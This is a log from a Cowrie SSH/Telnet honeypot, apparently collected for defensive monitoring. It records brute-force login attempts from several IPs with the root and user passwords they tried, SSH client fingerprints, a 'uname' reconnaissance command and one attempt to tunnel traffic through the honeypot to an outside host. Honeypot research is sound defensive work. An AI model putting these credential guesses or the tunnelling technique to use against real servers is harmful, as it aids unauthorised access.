{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:20:22.045065Z","src_ip":"185.246.128.133","session":"b14d92b4097c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40895,"dst_ip":"1.2.3.4","dst_port":22,"session":"27134965239d","protocol":"ssh","message":"New connection: 212.227.125.160:40895 (1.2.3.4:22) [session: 27134965239d]","sensor":"my-vps","timestamp":"2025-08-26T15:20:43.751343Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:20:44.067800Z","src_ip":"212.227.125.160","session":"27134965239d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40896,"dst_ip":"1.2.3.4","dst_port":22,"session":"eeca7b226884","protocol":"ssh","message":"New connection: 212.227.125.160:40896 (1.2.3.4:22) [session: eeca7b226884]","sensor":"my-vps","timestamp":"2025-08-26T15:20:44.329945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:20:44.361159Z","src_ip":"212.227.125.160","session":"eeca7b226884"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T15:20:44.622501Z","src_ip":"212.227.125.160","session":"eeca7b226884"}
{"eventid":"cowrie.login.success","username":"root","password":"------fuck------","message":"login attempt [root/------fuck------] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:20:46.328186Z","src_ip":"212.227.125.160","session":"eeca7b226884"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:20:47.262541Z","src_ip":"212.227.125.160","session":"eeca7b226884"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-08-26T15:20:47.263370Z","src_ip":"212.227.125.160","session":"eeca7b226884"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:20:47.634626Z","src_ip":"212.227.125.160","session":"eeca7b226884"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:20:47.635921Z","src_ip":"212.227.125.160","session":"eeca7b226884"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53086,"dst_ip":"1.2.3.4","dst_port":23,"session":"c1074557adcb","protocol":"telnet","message":"New connection: 212.227.125.160:53086 (1.2.3.4:23) [session: c1074557adcb]","sensor":"my-vps","timestamp":"2025-08-26T15:20:54.663000Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:21:06.843289Z","src_ip":"212.227.125.160","session":"1f90c44731e6"}
{"eventid":"cowrie.session.closed","duration":180.17681288719177,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:21:06.849768Z","src_ip":"212.227.125.160","session":"1f90c44731e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45222,"dst_ip":"1.2.3.4","dst_port":23,"session":"bb952e8a252d","protocol":"telnet","message":"New connection: 212.227.125.160:45222 (1.2.3.4:23) [session: bb952e8a252d]","sensor":"my-vps","timestamp":"2025-08-26T15:21:22.217207Z"}
{"eventid":"cowrie.session.closed","duration":30.74346923828125,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:21:25.406394Z","src_ip":"212.227.125.160","session":"c1074557adcb"}
{"eventid":"cowrie.session.closed","duration":31.264471292495728,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:21:53.481578Z","src_ip":"212.227.125.160","session":"bb952e8a252d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39084,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2e0e28e5f48","protocol":"ssh","message":"New connection: 212.227.235.229:39084 (1.2.3.4:22) [session: d2e0e28e5f48]","sensor":"my-vps","timestamp":"2025-08-26T15:22:34.558698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:22:35.052655Z","src_ip":"212.227.235.229","session":"d2e0e28e5f48"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:22:35.294115Z","src_ip":"212.227.235.229","session":"d2e0e28e5f48"}
{"eventid":"cowrie.login.success","username":"root","password":"Nanda@123","message":"login attempt [root/Nanda@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:22:37.595424Z","src_ip":"212.227.235.229","session":"d2e0e28e5f48"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:22:38.324756Z","src_ip":"212.227.235.229","session":"d2e0e28e5f48"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":48530,"dst_ip":"1.2.3.4","dst_port":22,"session":"09116dcee9aa","protocol":"ssh","message":"New connection: 45.88.8.186:48530 (1.2.3.4:22) [session: 09116dcee9aa]","sensor":"my-vps","timestamp":"2025-08-26T15:22:41.121047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:22:41.556086Z","src_ip":"45.88.8.186","session":"09116dcee9aa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:22:41.556806Z","src_ip":"45.88.8.186","session":"09116dcee9aa"}
{"eventid":"cowrie.login.success","username":"root","password":"14312010","message":"login attempt [root/14312010] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:22:43.771248Z","src_ip":"45.88.8.186","session":"09116dcee9aa"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:22:44.333185Z","src_ip":"45.88.8.186","session":"09116dcee9aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54693,"dst_ip":"1.2.3.4","dst_port":23,"session":"7133f54a06cf","protocol":"telnet","message":"New connection: 212.227.125.160:54693 (1.2.3.4:23) [session: 7133f54a06cf]","sensor":"my-vps","timestamp":"2025-08-26T15:22:46.889763Z"}
{"eventid":"cowrie.session.closed","duration":13.991214752197266,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:23:00.880878Z","src_ip":"212.227.125.160","session":"7133f54a06cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33042,"dst_ip":"1.2.3.4","dst_port":23,"session":"344b5f4958d5","protocol":"telnet","message":"New connection: 212.227.235.229:33042 (1.2.3.4:23) [session: 344b5f4958d5]","sensor":"my-vps","timestamp":"2025-08-26T15:23:12.479338Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:23:12.678270Z","src_ip":"212.227.235.229","session":"344b5f4958d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:23:12.739420Z","src_ip":"212.227.235.229","session":"344b5f4958d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46054,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc537710dd90","protocol":"ssh","message":"New connection: 212.227.235.229:46054 (1.2.3.4:22) [session: cc537710dd90]","sensor":"my-vps","timestamp":"2025-08-26T15:23:21.869026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-26T15:23:21.869685Z","src_ip":"212.227.235.229","session":"cc537710dd90"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-26T15:23:23.092200Z","src_ip":"212.227.235.229","session":"cc537710dd90"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49770,"dst_ip":"1.2.3.4","dst_port":22,"session":"e03aaa1a9b69","protocol":"ssh","message":"New connection: 217.72.205.35:49770 (1.2.3.4:22) [session: e03aaa1a9b69]","sensor":"my-vps","timestamp":"2025-08-26T15:23:43.520589Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:23:43.521678Z","src_ip":"217.72.205.35","session":"e03aaa1a9b69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":29851,"dst_ip":"1.2.3.4","dst_port":22,"session":"709b29cfe313","protocol":"ssh","message":"New connection: 212.227.235.229:29851 (1.2.3.4:22) [session: 709b29cfe313]","sensor":"my-vps","timestamp":"2025-08-26T15:23:56.515148Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:23:56.516288Z","src_ip":"212.227.235.229","session":"709b29cfe313"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30171,"dst_ip":"1.2.3.4","dst_port":22,"session":"c53805c93db2","protocol":"ssh","message":"New connection: 212.227.235.229:30171 (1.2.3.4:22) [session: c53805c93db2]","sensor":"my-vps","timestamp":"2025-08-26T15:23:56.646230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:23:56.647233Z","src_ip":"212.227.235.229","session":"c53805c93db2"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T15:23:56.779069Z","src_ip":"212.227.235.229","session":"c53805c93db2"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:23:57.175939Z","src_ip":"212.227.235.229","session":"c53805c93db2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T15:23:57.308325Z","session":"c53805c93db2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33786,"dst_ip":"1.2.3.4","dst_port":23,"session":"37352603b2a5","protocol":"telnet","message":"New connection: 212.227.125.160:33786 (1.2.3.4:23) [session: 37352603b2a5]","sensor":"my-vps","timestamp":"2025-08-26T15:24:08.302748Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62014,"dst_ip":"1.2.3.4","dst_port":22,"session":"233b40d6e86f","protocol":"ssh","message":"New connection: 212.227.125.160:62014 (1.2.3.4:22) [session: 233b40d6e86f]","sensor":"my-vps","timestamp":"2025-08-26T15:24:09.583157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T15:24:09.583947Z","src_ip":"212.227.125.160","session":"233b40d6e86f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T15:24:09.668319Z","src_ip":"212.227.125.160","session":"233b40d6e86f"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo","message":"login attempt [rodolfo/rodolfo] failed","sensor":"my-vps","timestamp":"2025-08-26T15:24:10.103290Z","src_ip":"212.227.125.160","session":"233b40d6e86f"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo1","message":"login attempt [rodolfo/rodolfo1] failed","sensor":"my-vps","timestamp":"2025-08-26T15:24:11.190652Z","src_ip":"212.227.125.160","session":"233b40d6e86f"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo123","message":"login attempt [rodolfo/rodolfo123] failed","sensor":"my-vps","timestamp":"2025-08-26T15:24:12.277376Z","src_ip":"212.227.125.160","session":"233b40d6e86f"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo1234","message":"login attempt [rodolfo/rodolfo1234] failed","sensor":"my-vps","timestamp":"2025-08-26T15:24:13.364443Z","src_ip":"212.227.125.160","session":"233b40d6e86f"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo12345","message":"login attempt [rodolfo/rodolfo12345] failed","sensor":"my-vps","timestamp":"2025-08-26T15:24:14.451422Z","src_ip":"212.227.125.160","session":"233b40d6e86f"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:24:15.538031Z","src_ip":"212.227.125.160","session":"233b40d6e86f"}
{"eventid":"cowrie.session.closed","duration":30.44176959991455,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:24:38.744422Z","src_ip":"212.227.125.160","session":"37352603b2a5"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:25:06.654040Z","src_ip":"212.227.235.229","session":"c53805c93db2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49426,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1106a331343","protocol":"ssh","message":"New connection: 212.227.125.160:49426 (1.2.3.4:22) [session: a1106a331343]","sensor":"my-vps","timestamp":"2025-08-26T15:25:07.838204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:25:07.839159Z","src_ip":"212.227.125.160","session":"a1106a331343"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T15:25:08.066454Z","src_ip":"212.227.125.160","session":"a1106a331343"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:25:15.838522Z","src_ip":"212.227.125.160","session":"a1106a331343"}
{"eventid":"cowrie.session.connect","src_ip":"213.231.24.195","src_port":50120,"dst_ip":"1.2.3.4","dst_port":23,"session":"e388e856ce1f","protocol":"telnet","message":"New connection: 213.231.24.195:50120 (1.2.3.4:23) [session: e388e856ce1f]","sensor":"my-vps","timestamp":"2025-08-26T15:25:17.041559Z"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:25:21.875832Z","src_ip":"212.227.235.229","session":"cc537710dd90"}
{"eventid":"cowrie.session.closed","duration":13.850774765014648,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:25:30.892238Z","src_ip":"213.231.24.195","session":"e388e856ce1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34946,"dst_ip":"1.2.3.4","dst_port":23,"session":"6a2d6d0dc74d","protocol":"telnet","message":"New connection: 212.227.125.160:34946 (1.2.3.4:23) [session: 6a2d6d0dc74d]","sensor":"my-vps","timestamp":"2025-08-26T15:25:50.738576Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61772,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ac46706dccb","protocol":"ssh","message":"New connection: 212.227.235.229:61772 (1.2.3.4:22) [session: 1ac46706dccb]","sensor":"my-vps","timestamp":"2025-08-26T15:26:03.109813Z"}
